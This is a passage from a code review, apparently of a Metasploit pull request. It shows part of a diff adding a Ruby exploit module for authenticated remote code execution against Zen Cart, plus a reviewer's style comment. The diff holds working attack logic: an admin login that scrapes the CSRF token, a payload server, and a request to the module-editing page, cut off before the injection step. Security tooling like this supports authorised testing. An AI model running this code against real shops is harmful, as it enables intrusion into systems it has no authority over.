modules/exploits/linux/http/zencart_authenticated_rce.rb

```diff
@@ -0,0 +1,205 @@
+    send_response(cli, payload.encoded, { 'Content-Type' => 'text/html' })
+  end
+
+  def tabanyol
+    datastore['BASEPATH']
+  end
+
+  def isim
+    datastore['USERNAME']
+  end
+
+  def parola
+    datastore['PASSWORD']
+  end
+
+  def login
+    # "index.php?cmd=login&camefrom=index.php"
+    res = send_request_cgi('method' => 'GET',
+                           'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php'),
+                           'vars_get' => {
+                             'cmd' => 'login',
+                             'camefrom' => 'index.php'
+                           })
+    # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
+    unless res
+      fail_with(Failure::Unreachable, 'Access web application failure')
+    end
+    if res.code != 200
+      fail_with(Failure::Unreachable, 'we not have 200 response')
+    end
+
+    if !res.get_cookies.empty?
+      @cookie = res.get_cookies
+      @csrftoken = res.body.scan(%r{<input type="hidden" name="securityToken" value="(.*)" />}).flatten[0] || ''
+      if @csrftoken.empty?
+        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+      end
+    end
+
+    res = send_request_cgi('method' => 'POST',
+                           'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php?cmd=login&camefrom=index.php'),
+                           'cookie' => @cookie,
+                           'vars_post' => {
+                             'securityToken' => @csrftoken,
+                             'action' => 'do' + @csrftoken,
+                             'admin_name' => isim,
+                             'admin_pass' => parola
+                           })
+    if res.code != 302
+      fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+    end
+    true
+  end
+
+  def check
+    unless login
+      fail_with(Failure::UnexpectedReply, 'Wrong credentials')
+      return CheckCode::NotVulnerable('Wrong credentials')
+    end
+    print_good('We loged in')
+    Exploit::CheckCode::Vulnerable
+    CheckCode::Vulnerable('Authenticated successfully')
+
+  end
+
+  def exploit
+    check
+    start_server
+    sleep(4)
+    res = send_request_cgi('method' => 'GET',
+                           'uri' => normalize_uri(tabanyol, target_uri.path, 'index.php'),
+                           'vars_get' => {
+                             'cmd' => 'modules',
+                             'set' => datastore['MODULE'],
+                             'module' => datastore['SETTING'],
+                             'action' => 'edit'
+                           },
+                           'cookie' => @cookie)
+    if res.code != 200
+      fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
+    end
+    # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
+    if res && res.code == 200
```

Comment:
The module can return early here, rather than wrapping most of the method contents in this conditional branch.